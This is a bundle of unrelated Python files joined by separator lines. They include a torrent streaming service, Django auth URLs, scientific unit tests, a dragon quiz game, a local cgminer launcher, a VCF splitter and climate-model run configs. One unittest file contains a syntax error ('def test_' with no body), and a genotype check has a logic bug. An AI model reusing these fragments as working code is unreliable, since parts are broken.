s.pex_peers += 1
if peer.source & 8:
s.lsd_peers += 1
return s
"""
Servicios:
- Estas funciones se ejecutan de forma automatica cada x tiempo en otro Thread.
- Estas funciones son ejecutadas mientras el torrent esta activo algunas pueden desactivarse
segun la configuracion como por ejemplo la escritura en el log
"""
def _auto_shutdown(self, *args, **kwargs):
"""
Servicio encargado de autoapagar el servidor
"""
if self.file and self.file.cursor:
self.last_connect = time.time()
self.connected = True
if self.is_playing_fnc and self.is_playing_fnc():
self.last_connect = time.time()
self.connected = True
if self.auto_shutdown:
# shudown por haber cerrado el reproductor
if self.connected and self.is_playing_fnc and not self.is_playing_fnc():
if time.time() - self.last_connect - 1 > self.timeout:
self.stop()
# shutdown por no realizar ninguna conexion
if (not self.file or not self.file.cursor) and self.start_time and self.wait_time and not self.connected:
if time.time() - self.start_time - 1 > self.wait_time:
self.stop()
# shutdown tras la ultima conexion
if (not self.file or not self.file.cursor) and self.timeout and self.connected and not self.is_playing_fnc:
if time.time() - self.last_connect - 1 > self.timeout:
self.stop()
def announce_torrent(self):
"""
Servicio encargado de anunciar el torrent
"""
self._th.force_reannounce()
self._th.force_dht_announce()
def save_state(self):
"""
Servicio encargado de guardar el estado
"""
state = self._ses.save_state()
f = open(os.path.join(self.temp_path, self.state_file), 'wb')
pickle.dump(state, f)
f.close()
def _update_ready_pieces(self, alert_type, alert):
"""
Servicio encargado de informar que hay una pieza disponible
"""
if alert_type == 'read_piece_alert' and self.file:
self.file.update_piece(alert.piece, alert.buffer)
def _check_meta(self):
"""
Servicio encargado de comprobar si los metadatos se han descargado
"""
if self.status.state >= 3 and self.status.state <= 5 and not self.has_meta:
# Guardamos los metadatos
self.meta = self._th.get_torrent_info()
# Obtenemos la lista de archivos del meta
fs = self.meta.files()
if isinstance(fs, list):
files = fs
else:
files = [fs.at(i) for i in xrange(fs.num_files())]
# Guardamos la lista de archivos
self.files = self._find_files(files)
# Si hay varios vídeos (no RAR), se selecciona el vídeo o "todos"
lista = []
seleccion = 0
for file in self.files:
if '.rar' in str(file.path):
seleccion = -9
lista += [os.path.split(str(file.path))[1]]
if len(lista) > 1 and seleccion >= 0:
d = xbmcgui.Dialog()
seleccion = d.select(msg_header + ": Selecciona el vídeo, o 'Cancelar' para todos", lista)
if seleccion < 0:
index = 0
self.index = seleccion
else:
index = seleccion
self.index = self.files[index].index
self.seleccion = seleccion
# Marcamos el primer archivo como activo
self.set_file(self.files[index])
# Damos por iniciada la descarga
self.start_time = time.time()
# Guardamos el .torrent en el cache
self._cache.file_complete(self._th.get_torrent_info())
self.has_meta = True
def priorize_start_file(self):
'''
Servicio encargado de priorizar el principio y final de archivo cuando no hay conexion
'''
if self.file and not self.file.cursor:
num_start_pieces = self.buffer_size - self.last_pieces_priorize # Cantidad de piezas a priorizar al inicio
num_end_pieces = self.last_pieces_priorize # Cantidad de piezas a priorizar al final
pieces_count = 0
# Priorizamos las ultimas piezas
for y in range(self.file.last_piece - num_end_pieces, self.file.last_piece + 1):
if not self._th.have_piece(y):
self.prioritize_piece(y, pieces_count)
pieces_count += 1
# Priorizamos las primeras piezas
for y in range(self.file.first_piece, self.file.last_piece + 1):
if not self._th.have_piece(y):
if pieces_count == self.buffer_size:
break
self.prioritize_piece(y, pieces_count)
pieces_count += 1
def print_status(self):
'''
Servicio encargado de mostrar en el log el estado de la descarga
'''
s = self.status ### ALFA
if self.seleccion >= 0:
archivo = self.seleccion + 1
else:
archivo = self.seleccion
logger.info(
'%.2f%% de %.1fMB %s | %.1f kB/s | #%s %d%% | AutoClose: %s | S: %d(%d) P: %d(%d)) | TRK: %d DHT: %d PEX: %d LSD %d | DHT:%s (%d) | Trakers: %d | Pieces: %d (%d)' % \
(s.progress_file, s.file_size, s.str_state, s._download_rate, archivo, s.buffer, s.timeout, s.num_seeds, \
s.num_complete, s.num_peers, s.num_incomplete, s.trk_peers, s.dht_peers, s.pex_peers, s.lsd_peers,
s.dht_state, s.dht_nodes, s.trackers, s.pieces_sum, s.pieces_len)) ### ALFA
|
from django.views.generic.simple import direct_to_template
from django.contrib.auth import views as auth_views
from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from registration.views import register
urlpatterns = patterns('',
# urls for simple one-step registration
url(r'^register/$',
register,
{'backend': 'registration.backends.simple.SimpleBackend',
'template_name': 'registration/registration_form.hamlpy',
},
name='registration_register'
),
url(r'^register/closed/$',
direct_to_template,
{'template': 'registration/registration_closed.hamlpy'},
name='registration_disallowed'
),
url(r'^login/$',
auth_views.login,
{'template_name': 'registration/login.hamlpy'},
name='auth_login'
),
url(r'^logout/$',
auth_views.logout,
{'template_name': 'registration/logout.hamlpy'},
name='auth_logout'
),
url(r'^password/change/$',
auth_views.password_change,
{'template_name': 'registration/password_change_form.hamlpy',
# ugh, this is tied to the namespace; needs to be namespace-agnostic
# since the namspace is determined by the importing app
# TODO: see Issue #1
'post_change_redirect': reverse_lazy('registration:auth_password_change_done')
},
name='auth_password_change'
),
url(r'^password/change/done/$',
auth_views.password_change_done,
{'template_name': 'registration/password_change_done.hamlpy'},
name='auth_password_change_done'
),
url(r'^password/reset/$',
auth_views.password_reset,
{'template_name': 'registration/password_reset_form.hamlpy',
# same issue as above
'post_reset_redirect': reverse_lazy('registration:auth_password_reset_done'),
'email_template_name': 'registration/password_reset_email.hamlpy',
'subject_template_name': 'registration/password_reset_subject.hamlpy',
},
name='auth_password_reset'
),
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
auth_views.password_reset_confirm,
{'template_name': 'registration/password_reset_confirm.hamlpy',
# same issue as above
'post_reset_redirect': reverse_lazy('registration:auth_password_reset_complete'),
},
name='auth_password_reset_confirm'
),
url(r'^password/reset/complete/$',
auth_views.password_reset_complete,
{'template_name': 'registration/password_reset_complete.hamlpy'},
name='auth_password_reset_complete'
),
url(r'^password/reset/done/$',
auth_views.password_reset_done,
{'template_name': 'registration/password_reset_done.hamlpy'},
name='auth_password_reset_done'
),
)
|
name = "*PEAK only"
Cs={}
maxS=2
maxW=2
splitheavies=0
Cs['strength.w=>-p']=1
Cs['footmin-w-resolution']=1
Cs['footmin-f-resolution']=1
Cs['skip_initial_foot']=1
|
from gnuradio import gr, gr_unittest
from gnuradio import blocks
import grdab
class qa_measure_processing_rate(gr_unittest.TestCase):
"""
@brief QA for measure processing rate sink.
This class implements a test bench to verify the corresponding C++ class.
"""
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_001_measure_processing_rate(self):
src = blocks.null_source(gr.sizeof_gr_complex)
throttle = blocks.throttle(gr.sizeof_gr_complex, 1000000)
head = blocks.head(gr.sizeof_gr_complex, 200000)
sink = grdab.measure_processing_rate(gr.sizeof_gr_complex,100000)
self.tb.connect(src, throttle, head, sink)
self.tb.run()
rate = sink.processing_rate()
assert(rate > 900000 and rate < 1100000)
def test_002_measure_processing_rate(self):
src = blocks.null_source(gr.sizeof_char)
throttle = blocks.throttle(gr.sizeof_char, 10000000)
head = blocks.head(gr.sizeof_char, 1000000)
sink = grdab.measure_processing_rate(gr.sizeof_char,1000000)
self.tb.connect(src, throttle, head, sink)
self.tb.run()
rate = sink.processing_rate()
assert(rate > 8000000 and rate < 12000000)
if __name__ == '__main__':
gr_unittest.main()
|
import numpy as np
import unittest as ut
import espressomd
import espressomd.electrostatics
import espressomd.interactions
from espressomd import drude_helpers
class Drude(ut.TestCase):
@ut.skipIf(not espressomd.has_features("P3M", "THOLE", "LANGEVIN_PER_PARTICLE"), "Test needs P3M, THOLE and LANGEVIN_PER_PARTICLE")
def test(self):
"""
Sets up a BMIM PF6 pair separated in y-direction with fixed cores.
Adds the Drude particles and related features (intramolecular exclusion bonds, Thole screening)
via helper functions.
Calculates the induced dipole moment and the diagonals of the polarization tensor
and compares against reference results, which where reproduced with LAMMPS.
"""
box_l = 50
system = espressomd.System(box_l=[box_l, box_l, box_l])
system.seed = system.cell_system.get_state()['n_nodes'] * [12]
np.random.seed(12)
#Reference Results, reproduced with LAMMPS
#Dipole Moments
ref_mu0_pf6 = [0.00177594, 0.16480996, -0.01605161]
ref_mu0_c1 = [0.00076652, 0.15238767, 0.00135291]
ref_mu0_c2 = [-0.00020222, 0.11084197, 0.00135842]
ref_mu0_c3 = [0.00059177, 0.23949626, -0.05238468]
ref_mu0_bmim = [0.00115606, 0.5027259, -0.04967335]
#Polarisation Tensor diagonals
ref_pol_pf6 = [
4.5535698335873445, 4.7558611769477697, 4.5546580162000554]
ref_pol_bmim = [
13.126868394164262, 14.392582501485913, 16.824150151623762]
#TIMESTEP
fs_to_md_time = 1.0e-2
time_step_fs = 0.5
time_step_ns = time_step_fs * 1e-6
dt = time_step_fs * fs_to_md_time
#COM TEMPERATURE
#Global thermostat temperature, for com and langevin.
#LangevinPerParticle temperature is set to 0 for drude and core to properly account for com forces.
# Like that, langevin thermostat can still be used for non-drude
# particles
SI_temperature = 300.0
gamma_com = 1.0
kb_kjmol = 0.0083145
temperature_com = SI_temperature * kb_kjmol
# COULOMB PREFACTOR (elementary charge)^2 / (4*pi*epsilon_0) in
# Angstrom * kJ/mol
coulomb_prefactor = 1.67101e5 * kb_kjmol
#POLARIZATION
#polarization = 1.0 #In (Angstrom^3)_CGS
# alpha_SI = 4*Pi*eps_0 alpha_CGS;
# 4*Pi*epsilon_0*Angstrom^3/((elementary charge)^2*Angstrom^2*N_A/kJ)
conv_pol_CGS_SI = 7.197586e-4
#alpha = conv_pol_CGS_SI*args.polarization
#DRUDE/TOTAL MASS
#lamoureux03 used values 0.1-0.8 g/mol for drude mass
mass_drude = 0.8
mass_tot = 100.0
mass_core = mass_tot - mass_drude
mass_red_drude = mass_drude * mass_core / mass_tot
#SPRING CONSTANT DRUDE
#Used 1000kcal/mol/A^2 from lamoureux03a table 1 p 3031
k_drude = 4184.0
# in kJ/mol/A^2
T_spring = 2.0 * np.pi * np.sqrt(mass_drude / k_drude)
#T_spring_fs = T_spring/fs_to_md_time
#Period of free oscillation: T_spring = 2Pi/w; w = sqrt(k_d/m_d)
#TEMP DRUDE
# Used T* = 1K from lamoureux03a p 3031 (2) 'Cold drude oscillators
# regime'
SI_temperature_drude = 1.0
temperature_drude = SI_temperature_drude * kb_kjmol
#GAMMA DRUDE
#Thermostat relaxation time should be similar to T_spring
gamma_drude = mass_red_drude / T_spring
system.cell_system.skin = 0.4
system.time_step = dt
#Forcefield
types = {"PF6": 0, "BMIM_C1": 1, "BMIM_C2": 2, "BMIM_C3":
3, "BMIM_COM": 4, "PF6_D": 5, "BMIM_C1_D": 6, "BMIM_C2_D": 7, "BMIM_C3_D": 8}
charges = {"PF6": -0.78, "BMIM_C1": 0.4374,
"BMIM_C2": 0.1578, "BMIM_C3": 0.1848, "BMIM_COM": 0}
polarizations = {"PF6": 4.653, "BMIM_C1":
5.693, "BMIM_C2": 2.103, "BMIM_C3": 7.409}
masses = {"PF6": 144.96, "BMIM_C1": 67.07,
"BMIM_C2": 15.04, "BMIM_C3": 57.12, "BMIM_COM": 0}
masses["BMIM_COM"] = masses["BMIM_C1"] + \
masses["BMIM_C2"] + masses["BMIM_C3"]
box_center = 0.5 * np.array(3 * [box_l])
system.min_global_cut = 3.5
#Place Particles
dmol = 5.0
#Test Anion
pos_pf6 = box_center + np.array([0, dmol, 0])
system.part.add(id=0, type=types["PF6"], pos=pos_pf6, q=charges[
"PF6"], mass=masses["PF6"], fix=[1, 1, 1])
pos_com = box_center - np.array([0, dmol, 0])
system.part.add(id=2, type=types["BMIM_C1"], pos=pos_com + [
0, -0.527, 1.365], q=charges["BMIM_C1"], mass=masses["BMIM_C1"], fix=[1, 1, 1])
system.part.add(id=4, type=types["BMIM_C2"], pos=pos_com + [
0, 1.641, 2.987], q=charges["BMIM_C2"], mass=masses["BMIM_C2"], fix=[1, 1, 1])
system.part.add(id=6, type=types["BMIM_C3"], pos=pos_com + [
0, 0.187, -2.389], q=charges["BMIM_C3"], mass=masses["BMIM_C3"], fix=[1, 1, 1])
system.thermostat.set_langevin(kT=temperature_com, gamma=gamma_com)
p3m = espressomd.electrostatics.P3M(
prefactor=coulomb_prefactor, accuracy=1e-4, mesh=[18, 18, 18], cao=5)
system.actors.add(p3m)
#Drude related Bonds
thermalized_dist_bond = espressomd.interactions.ThermalizedBond(
temp_com=temperature_com, gamma_com=gamma_com, temp_distance=temperature_drude, gamma_distance=gamma_drude, r_cut=1.0)
harmonic_bond = espressomd.interactions.HarmonicBond(
k=k_drude, r_0=0.0, r_cut=1.0)
system.bonded_inter.add(thermalized_dist_bond)
system.bonded_inter.add(harmonic_bond)
drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
0], 1, types["PF6_D"], polarizations["PF6"], mass_drude, coulomb_prefactor, 2.0)
drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
2], 3, types["BMIM_C1_D"], polarizations["BMIM_C1"], mass_drude, coulomb_prefactor, 2.0)
drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
4], 5, types["BMIM_C2_D"], polarizations["BMIM_C2"], mass_drude, coulomb_prefactor, 2.0)
drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
6], 7, types["BMIM_C3_D"], polarizations["BMIM_C3"], mass_drude, coulomb_prefactor, 2.0)
#Setup and add Drude-Core SR exclusion bonds
drude_helpers.setup_and_add_drude_exclusion_bonds(system)
#Setup intramol SR exclusion bonds once
drude_helpers.setup_intramol_exclusion_bonds(
system, [6, 7, 8], [1, 2, 3], [charges["BMIM_C1"], charges["BMIM_C2"], charges["BMIM_C3"]])
#Add bonds per molecule
drude_helpers.add_intramol_exclusion_bonds(
system, [3, 5, 7], [2, 4, 6])
#Thole
drude_helpers.add_all_thole(system)
def dipole_moment(id_core, id_drude):
pc = system.part[id_core]
pd = system.part[id_drude]
v = pd.pos - pc.pos
return pd.q * v
def measure_dipole_moments():
dm_pf6 = []
dm_C1 = []
dm_C2 = []
dm_C3 = []
system.integrator.run(115)
for i in range(100):
system.integrator.run(1)
dm_pf6.append(dipole_moment(0, 1))
dm_C1.append(dipole_moment(2, 3))
dm_C2.append(dipole_moment(4, 5))
dm_C3.append(dipole_moment(6, 7))
dm_pf6_m = np.mean(dm_pf6, axis=0)
dm_C1_m = np.mean(dm_C1, axis=0)
dm_C2_m = np.mean(dm_C2, axis=0)
dm_C3_m = np.mean(dm_C3, axis=0)
dm_sum_bmim = dm_C1_m + dm_C2_m + dm_C3_m
res = dm_pf6_m, dm_C1_m, dm_C2_m, dm_C3_m, dm_sum_bmim
return res
def setElectricField(E):
E = np.array(E)
for p in system.part:
p.ext_force = p.q * E
def calc_pol(mu0, muE, E):
pol = (muE - mu0) / E / conv_pol_CGS_SI
return pol
def measure_pol(Es, dim):
E = [0.0, 0.0, 0.0]
E[dim] = Es
setElectricField(E)
mux_pf6, mux_c1, mux_c2, mux_c3, mux_bmim = measure_dipole_moments(
)
return calc_pol(mu0_pf6[dim], mux_pf6[dim], Es), calc_pol(mu0_bmim[dim], mux_bmim[dim], Es)
mu0_pf6, mu0_c1, mu0_c2, mu0_c3, mu0_bmim = measure_dipole_moments()
eA_to_Debye = 4.8032047
atol = 1e-2
rtol = 1e-2
np.testing.assert_allclose(
ref_mu0_pf6, eA_to_Debye * mu0_pf6, atol=atol, rtol=rtol)
np.testing.assert_allclose(
ref_mu0_c1, eA_to_Debye * mu0_c1, atol=atol, rtol=rtol)
np.testing.assert_allclose(
ref_mu0_c2, eA_to_Debye * mu0_c2, atol=atol, rtol=rtol)
np.testing.assert_allclose(
ref_mu0_c3, eA_to_Debye * mu0_c3, atol=atol, rtol=rtol)
np.testing.assert_allclose(
ref_mu0_bmim, eA_to_Debye * mu0_bmim, atol=atol, rtol=rtol)
pol_pf6 = []
pol_bmim = []
Efield = 96.48536 # = 1 V/A in kJ / (Avogadro Number) / Angstrom / elementary charge
res = measure_pol(Efield, 0)
pol_pf6.append(res[0])
pol_bmim.append(res[1])
res = measure_pol(Efield, 1)
pol_pf6.append(res[0])
pol_bmim.append(res[1])
res = measure_pol(Efield, 2)
pol_pf6.append(res[0])
pol_bmim.append(res[1])
np.testing.assert_allclose(
ref_pol_pf6, pol_pf6, atol=atol, rtol=rtol)
np.testing.assert_allclose(
ref_pol_bmim, pol_bmim, atol=atol, rtol=rtol)
if __name__ == "__main__":
ut.main()
|
from GangaCore.GPIDev.Lib.Tasks import ITask
from GangaCore.GPIDev.Schema import Schema, Version
class CoreTask(ITask):
"""General non-experimentally specific Task"""
_schema = Schema(Version(1, 0), dict(ITask._schema.datadict.items()))
_category = 'tasks'
_name = 'CoreTask'
_exportmethods = ITask._exportmethods + []
_tasktype = "ITask"
default_registry = "tasks"
|
from enemies import *
from hero import *
def annoying_input_int(message =''):
answer = None
while answer == None:
try:
answer = int(input(message))
except ValueError:
print('Вы ввели недопустимые символы')
return answer
def game_tournament(hero, dragon_list):
for dragon in dragon_list:
print('Вышел', dragon._color, 'дракон!')
while dragon.is_alive() and hero.is_alive():
print('Вопрос:', dragon.question())
answer = annoying_input_int('Ответ:')
if dragon.check_answer(answer):
hero.attack(dragon)
print('Верно! \n** дракон кричит от боли **')
else:
dragon.attack(hero)
print('Ошибка! \n** вам нанесён удар... **')
if dragon.is_alive():
break
print('Дракон', dragon._color, 'повержен!\n')
if hero.is_alive():
print('Поздравляем! Вы победили!')
print('Ваш накопленный опыт:', hero._experience)
else:
print('К сожалению, Вы проиграли...')
def start_game():
try:
print('Добро пожаловать в арифметико-ролевую игру с драконами!')
print('Представьтесь, пожалуйста: ', end = '')
hero = Hero(input())
dragon_number = 3
dragon_list = generate_dragon_list(dragon_number)
assert(len(dragon_list) == 3)
print('У Вас на пути', dragon_number, 'драконов!')
game_tournament(hero, dragon_list)
except EOFError:
print('Поток ввода закончился. Извините, принимать ответы более невозможно.')
|
__all__ = [
"test_config_db",
"test_grid",
"test_shell",
"test_svn",
]
if __name__ == "__main__" :
import doctest
for i in __all__ :
print ("%%-%ds: %%s" % (max(map(len, __all__)) + 1)) % (
i,
doctest.testmod(__import__(i, None, None, [i, ], ), ),
)
|
import socket
import json
import sys
import subprocess
import time
import os
path = "/home/ltcminer/mining/cgminer/cgminer"
log_file = "/home/ltcminer/mining/minerlite.log"
def linesplit(socket):
buffer = socket.recv(4096)
done = False
while not done:
more = socket.recv(4096)
if not more:
done = True
else:
buffer = buffer+more
if buffer:
return buffer
def retrieve_cgminer_info(command, parameter):
"""retrieve status of devices from cgminer
"""
api_ip = '127.0.0.1'
api_port = 4028
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((api_ip,int(api_port)))
if not parameter:
s.send(json.dumps({"command":command,"parameter":parameter}))
else:
s.send(json.dumps({"command":command}))
response = linesplit(s)
response = response.replace('\x00','')
return_val = response
response = json.loads(response)
# print response
s.close()
return return_val
def run_cgminer(path):
subprocess.Popen([path, "--api-listen"])
print "Starting cgminer in 2 seconds"
time.sleep(2)
print "Running cgminer ..."
run_cgminer(path)
time.sleep(15)
with open(log_file, 'a') as logfile:
try:
logfile.write( retrieve_cgminer_info("devs", None) )
except socket.error:
pass
|
import re
import sys
import os
import getopt
import vcf
def main():
params = parseArgs()
vfh = vcf.Reader(open(params.vcf, 'r'))
#grab contig sizes
contigs = dict()
for c,s in vfh.contigs.items():
contigs[s.id] = s.length
regions = list()
this_chrom = None
start = int()
stop = int()
count = 0
for rec in vfh:
if not this_chrom:
this_chrom = rec.CHROM
start = 1
stop = 1
count = 0
#If we entered new chromosome, submit old break
elif this_chrom != rec.CHROM:
t = tuple([this_chrom, start, contigs[this_chrom]])
regions.append(t)
this_chrom = rec.CHROM
start = 1
stop = 1
count = 0
#if this SNP is parsimony-informative
if rec.is_snp and not rec.is_monomorphic:
#Check if parsimony-informative
if is_PIS(rec):
count+=1
#if this is the final PIS, submit region to list
if count == params.force:
stop = rec.POS
t = tuple([this_chrom, start, stop])
regions.append(t)
start = stop + 1
count = 0
t = tuple([this_chrom, start, contigs[this_chrom]])
regions.append(t)
print("Writing regions to out.regions...")
write_regions("out.regions", regions)
def write_regions(f, r):
with open(f, 'w') as fh:
try:
for reg in r:
ol = str(reg[0]) + ":" + str(reg[1]) + "-" + str(reg[2]) + "\n"
fh.write(ol)
except IOError as e:
print("Could not read file %s: %s"%(f,e))
sys.exit(1)
except Exception as e:
print("Unexpected error reading file %s: %s"%(f,e))
sys.exit(1)
finally:
fh.close()
def is_PIS(r):
ref=0
alt=0
for call in r.samples:
if call.gt_type:
if call.gt_type == 0:
ref += 1
elif call.gt_type == 1:
alt += 1
elif call.gt_type == 2:
alt += 1
ref += 1
if ref >= 2 and alt >= 2:
return(True)
if ref <= 2 and alt <= 2:
return(False)
class parseArgs():
def __init__(self):
#Define options
try:
options, remainder = getopt.getopt(sys.argv[1:], 'v:f:h', \
["vcf=" "help", "force="])
except getopt.GetoptError as err:
print(err)
self.display_help("\nExiting because getopt returned non-zero exit status.")
#Default values for params
#Input params
self.vcf=None
self.force=100000
#First pass to see if help menu was called
for o, a in options:
if o in ("-h", "-help", "--help"):
self.display_help("Exiting because help menu was called.")
#Second pass to set all args.
for opt, arg_raw in options:
arg = arg_raw.replace(" ","")
arg = arg.strip()
opt = opt.replace("-","")
#print(opt,arg)
if opt in ('v', 'vcf'):
self.vcf = arg
elif opt in ('f','force'):
self.force=int(arg)
elif opt in ('h', 'help'):
pass
else:
assert False, "Unhandled option %r"%opt
#Check manditory options are set
if not self.vcf:
self.display_help("Must provide VCF file <-v,--vcf>")
def display_help(self, message=None):
if message is not None:
print()
print (message)
print ("\nfindBreaksVCF.py\n")
print ("Contact:Tyler K. Chafin, University of Arkansas,tkchafin@uark.edu")
print ("\nUsage: ", sys.argv[0], "-v <input.vcf> -f <100000>\n")
print ("Description: Breaks chromosomes into chunks of X parsimony-informative sites, for running MDL")
print("""
Arguments:
-v,--vcf : VCF file for parsing
-f,--force : Number of PIS to force a break
-h,--help : Displays help menu
""")
print()
sys.exit()
if __name__ == '__main__':
main()
|
from aospy import Run
am2_control = Run(
name='am2_control',
description=(
'Preindustrial control simulation.'
),
data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
'SM2.1U_Control-1860_lm2_aie_rerun6.YIM/pp'),
data_in_dur=5,
data_in_start_date='0001-01-01',
data_in_end_date='0080-12-31',
default_date_range=('0021-01-01', '0080-12-31'),
idealized=False
)
am2_tropics = Run(
name='am2_tropics',
description=(
'Anthropogenic sulfate aerosol forcing only in the'
' Northern Hemisphere tropics (EQ to 30N)'
),
data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
'SM2.1U_Control-1860_lm2_aie2_tropical_rerun6.YIM/pp'),
data_in_dur=5,
data_in_start_date='0001-01-01',
data_in_end_date='0080-12-31',
default_date_range=('0021-01-01', '0080-12-31'),
idealized=False
)
am2_extratropics = Run(
name='am2_extratropics',
description=(
'Anthropogenic sulfate aerosol forcing only in the'
' Northern Hemisphere extratropics (30N to Pole)'
),
data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
'SM2.1U_Control-1860_lm2_aie2_extropical_rerun6.YIM/pp'),
data_in_dur=5,
data_in_start_date='0001-01-01',
data_in_end_date='0080-12-31',
default_date_range=('0021-01-01', '0080-12-31'),
idealized=False
)
am2_tropics_and_extratropics = Run(
name='am2_tropics+extratropics',
description=(
'Anthropogenic sulfate aerosol forcing everywhere'
),
data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
'SM2.1U_Control-1860_lm2_aie2_rerun6.YIM/pp'),
data_in_dur=5,
data_in_start_date='0001-01-01',
data_in_end_date='0080-12-31',
default_date_range=('0021-01-01', '0080-12-31'),
idealized=False
)
am2_HadISST_control = Run(
name='am2_HadISST_control',
description=(
'1981-2000 HadISST climatological annual cycle of SSTs and sea '
'ice repeated annually, with PD atmospheric composition.'
),
data_in_direc=('/archive/yim/siena_201203/m45_am2p14_1990/'
'gfdl.ncrc2-intel-prod/pp'),
data_in_dur=16,
data_in_start_date='1983-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_control = Run(
name='am2_reyoi_control',
tags=['reyoi', 'cont'],
description='PI atmos and Reynolds OI climatological SSTs',
data_in_direc=('/archive/Spencer.Hill/am2/am2clim_reyoi/'
'gfdl.ncrc2-default-prod/pp'),
data_in_dur=1,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_extratropics_full = Run(
name='am2_reyoi_extratropics_full',
description=(
'Full SST anomaly pattern applied to REYOI fixed SST climatology.'),
data_in_direc=('/archive/Spencer.Clark/am2/'
'am2clim_reyoi_extratropics_full/'
'gfdl.ncrc2-default-prod/pp'),
data_in_dur=17,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_extratropics_sp = Run(
name='am2_reyoi_extratropics_sp',
description=(
'Spatial Pattern SST anomaly pattern applied to'
' REYOI fixed SST climatology.'),
data_in_direc=('/archive/Spencer.Clark/am2/'
'am2clim_reyoi_extratropics_sp/gfdl.ncrc2-default-prod/pp'),
data_in_dur=17,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_tropics_sp_SI = Run(
name='am2_reyoi_tropics_sp_SI',
description=(
'Spatial Pattern SST anomaly pattern applied to REYOI fixed SST'
' climatology.'),
data_in_direc=('/archive/Spencer.Clark/am2/'
'am2clim_reyoi_tropics_sp_SI/gfdl.ncrc2-default-prod/pp'),
data_in_dur=17,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_tropics_full = Run(
name='am2_reyoi_tropics_full',
description=(
'Full SST anomaly pattern applied to REYOI fixed SST climatology.'),
data_in_direc=('/archive/Spencer.Clark/am2/'
'am2clim_reyoi_tropics_full/gfdl.ncrc2-default-prod/pp'),
data_in_dur=17,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_extratropics_sp_SI = Run(
name='am2_reyoi_extratropics_sp_SI',
description=(
'Spatial Pattern SST anomaly pattern applied to REYOI fixed'
' SST climatology. Fixed sea-ice.'),
data_in_direc=('/archive/Spencer.Clark/am2/'
'am2clim_reyoi_extratropics_sp_SI/'
'gfdl.ncrc2-default-prod/pp'),
data_in_dur=17,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_extratropics_u = Run(
name='am2_reyoi_extratropics_u',
description=(
'Uniform SST anomaly pattern applied to REYOI fixed SST climatology.'),
data_in_direc=('/archive/Spencer.Clark/am2/'
'am2clim_reyoi_extratropics_u/gfdl.ncrc2-default-prod/pp'),
data_in_dur=17,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
am2_reyoi_tropics_u = Run(
name='am2_reyoi_tropics_u',
description=(
'Uniform SST anomaly pattern applied to REYOI fixed SST climatology.'),
data_in_direc=('/archive/Spencer.Clark/am2/'
'am2clim_reyoi_tropics_u/gfdl.ncrc2-default-prod/pp'),
data_in_dur=17,
data_in_start_date='1982-01-01',
data_in_end_date='1998-12-31',
default_date_range=('1983-01-01', '1998-12-31'),
idealized=False
)
|
import unittest
from dumpformat import dumpManager
#try to save .test.xml does not work, why ?
class mltriesTest(unittest.TestCase):
def setUp(self):
self.d = dumpManager()
def test_init(self):
self.d.save("./test.xml")
def test_
def test_load(self):
pass
#TODO
#save then load and compare
if __name__ == '__main__':
unittest.main()
|
from PySide import QtGui, QtCore
from tool import Tool, EventData, MouseButtons, KeyModifiers, Face
from plugin_api import register_plugin
class ExtrudeTool(Tool):
def __init__(self, api):
super(ExtrudeTool, self).__init__(api)
# Create our action / icon
self.action = QtGui.QAction(QtGui.QPixmap(":/images/gfx/icons/border-bottom-thick.png"), "Extrude", None)
self.action.setStatusTip("Extude region")
self.action.setCheckable(True)
self.action.setShortcut(QtGui.QKeySequence("Ctrl+0"))
# Register the tool
self.priority = 10
self.api.register_tool(self)
# Area tool helper
self._mouse = None
self._stamp = []
self.xdir = True
self.ydir = True
self.zdir = True
self.pastoffset = 0
self.fixeddirection = False
def drawstamp(self, data, dx, dy, dz):
for x, y, z, col in self._stamp:
tgt = data.voxels.get(x + dx, y + dy, z + dz)
if tgt == 0:
data.voxels.set(x + dx, y + dy, z + dz, col, True, 1)
data.voxels.completeUndoFill()
def on_drag_start(self, data):
if len(data.voxels._selection) > 0:
self._stamp = []
for x, y, z in data.voxels._selection:
col = data.voxels.get(x, y, z)
self._stamp.append((x, y, z, col))
self._mouse = (data.mouse_x, data.mouse_y)
if QtCore.Qt.Key_X in data.keys:
self.xdir = True
self.ydir = False
self.zdir = False
self.fixeddirection = True
elif QtCore.Qt.Key_Y in data.keys:
self.xdir = False
self.ydir = True
self.zdir = False
self.fixeddirection = True
elif QtCore.Qt.Key_Z in data.keys:
self.xdir = False
self.ydir = False
self.zdir = True
self.fixeddirection = True
else:
self.xdir = True
self.ydir = True
self.zdir = True
self.fixeddirection = False
self.pastoffset = 0
# When dragging, create the selection
def on_drag(self, data):
# In case the first click has missed a valid target.
if self._mouse is None or len(self._stamp) == 0:
return
dx = data.mouse_x - self._mouse[0]
dy = data.mouse_y - self._mouse[1]
# Work out some sort of vague translation between screen and voxels
